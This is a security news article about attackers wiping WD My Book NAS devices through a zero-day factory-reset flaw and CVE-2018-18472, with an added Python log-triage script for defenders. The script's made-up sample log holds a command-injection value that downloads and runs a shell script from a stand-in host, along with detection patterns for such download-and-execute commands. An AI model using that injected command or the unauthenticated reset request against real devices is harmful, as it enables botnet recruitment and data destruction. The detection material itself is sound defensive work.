Zero-day flaw allowed WD My Book NAS devices to be wiped
When we first covered the serious incident that put WD My Book users' data at risk, the cause was still unknown. Now what we suspected has been confirmed: a vulnerability. Specifically, a zero-day flaw that was exploited in the wild.
Many users reported that on June 24 a script called factoryRestore.sh ran on their devices and deleted their files. What this script does is return the device to the state in which it left the factory, with everything that entails: all stored data is erased.
It should be remembered that this device has not received firmware updates since 2015. An unpatched security flaw that attackers can exploit is obviously a serious problem, and it can lead to exactly what we have seen here.
It now appears that the attackers did exploit the known vulnerability registered as CVE-2018-18472, but that they used a different, previously unknown zero-day flaw to reset the devices to factory settings and erase all stored content.
The latest device firmware is also affected
This zero-day vulnerability affects even the latest firmware available for the device. It allows an attacker to trigger a factory reset remotely, without authenticating, returning the device to its out-of-the-box state on any unit reachable from the Internet.
Security researchers have also indicated that attacks may have been going on for a long time. According to researcher Derek Abdine, attackers had for some time been exploiting CVE-2018-18472, a flaw dating from 2018, in order to add WD My Book devices to a botnet. We already know how important it is to keep a device from being recruited into a botnet.
This vulnerability served as the entry point: it allows the attacker to run a command on the device that downloads a script from a remote server and executes it. Once recruited into the botnet, the devices could be controlled remotely and used to launch DDoS attacks, attack other systems, or even steal the files stored on them.
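The two patterns described above, a command injected through the device's web API that fetches and runs a script, and a factory restore being requested and then executed, both leave traces in the NAS log. The following triage script is an added example written for this article, not code from RedesZone or Western Digital. The sample log excerpt is constructed: its syslog-style layout, the endpoint names Language_configuration and System_factory_restore, the addresses and the URL are assumptions made for the example, not captured device output, so adapt the regular expressions to what your device actually writes.

```python
"""Triage NAS log lines for remote download-and-execute commands and factory
restores. Added example, not the article's or Western Digital's code."""
import ipaddress
import re

# Constructed sample excerpt (made up for this example). The layout, endpoint
# names, client addresses and URL are assumptions, not real device output.
SAMPLE_LOG = """\
Jun 20 03:22:11 MyBookLive REST_API[4411]: 203.0.113.7 PARAMETER Language_configuration PUT : language = en_US`wget -q -O /tmp/x http://198.51.100.9/x.sh; sh /tmp/x`
Jun 20 03:22:12 MyBookLive REST_API[4411]: 203.0.113.7 OUTPUT Language_configuration PUT SUCCESS
Jun 22 09:00:00 MyBookLive REST_API[5101]: 192.168.1.40 PARAMETER Language_configuration PUT : language = fr_FR
Jun 23 15:14:05 MyBookLive REST_API[9529]: 203.0.113.7 PARAMETER System_factory_restore POST : erase = none
Jun 23 15:14:05 MyBookLive logger: factoryRestore.sh: begin script
Jun 23 15:16:02 MyBookLive logger: factoryRestore.sh: end script
"""

# "Mon DD HH:MM:SS host process: message" (assumed syslog-style layout).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<proc>[^:]+): (?P<msg>.*)$"
)
# "client PARAMETER endpoint METHOD : name = value" (assumed REST_API layout).
PARAM_RE = re.compile(r"^(?P<client>\S+) PARAMETER (?P<endpoint>\S+) (?P<method>\S+) : (?P<params>.*)$")
# A downloader (curl/wget) whose result is handed to a shell through a pipe or a
# chained command: the "download a script and run it" pattern.
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:curl|wget)\b.*?(?:\||;|&&)\s*(?:ba|da)?sh\b")
# Shell metacharacters in a parameter value that should be plain text.
SHELL_META_RE = re.compile(r"[`$;|&]")
RESTORE_SCRIPT_RE = re.compile(r"factoryRestore\.sh: begin script")

# Ranges treated as "local": RFC 1918, loopback and link-local. ipaddress.is_global
# is deliberately not used, because it also classifies the RFC 5737 documentation
# addresses used in the sample (203.0.113.0/24) as non-global.
_LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_public(addr: str) -> bool:
    """True when the client address lies outside the local ranges above."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in _LOCAL_NETS)


def triage(log_text: str) -> list:
    """Return findings in log order; each is a dict with ts, kind, severity, client, detail."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, msg = m["ts"], m["msg"]
        # The restore script itself logging its start: the wipe has begun.
        if m["proc"] == "logger" and RESTORE_SCRIPT_RE.search(msg):
            findings.append({"ts": ts, "kind": "factory_restore_executed",
                             "severity": "critical", "client": None, "detail": msg})
            continue
        p = PARAM_RE.match(msg)
        if not p:
            continue
        client, endpoint, params = p["client"], p["endpoint"], p["params"]
        if DOWNLOAD_EXEC_RE.search(params):
            findings.append({"ts": ts, "kind": "remote_download_exec",
                             "severity": "critical", "client": client, "detail": params})
        elif SHELL_META_RE.search(params):
            findings.append({"ts": ts, "kind": "shell_metacharacters",
                             "severity": "high", "client": client, "detail": params})
        if endpoint.lower() == "system_factory_restore":
            # A reset requested from the LAN may be the owner; from the Internet it is not.
            severity = "critical" if is_public(client) else "high"
            findings.append({"ts": ts, "kind": "factory_restore_request",
                             "severity": severity, "client": client, "detail": params})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['ts']}  {f['severity']:8s} {f['kind']:24s} {f['client'] or '-':15s} {f['detail']}")
```

Run against the sample, the script reports the injected wget command from a public address as critical, then the factory-restore request from the same address, then the restore script actually starting. The same restore request coming from a LAN address is only rated high, since it may be the owner; the point is that a reset request arriving from a public address on a device that is not supposed to be exposed at all is itself the incident indicator.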
Once again we see the importance of keeping all our equipment updated and free of known vulnerabilities. This applies especially to IoT devices: we have more and more devices connected to the network, and each one is exposed the moment a vulnerability appears and can be exploited. There are many kinds of malware that can harm us in one way or another.
From RedesZone we recommend protecting every device connected to the network. We have seen many cases in which devices are attacked through a vulnerability in the firmware (as here) or in an installed program. A device that no longer receives updates, and therefore cannot be patched, should not be reachable from the Internet at all.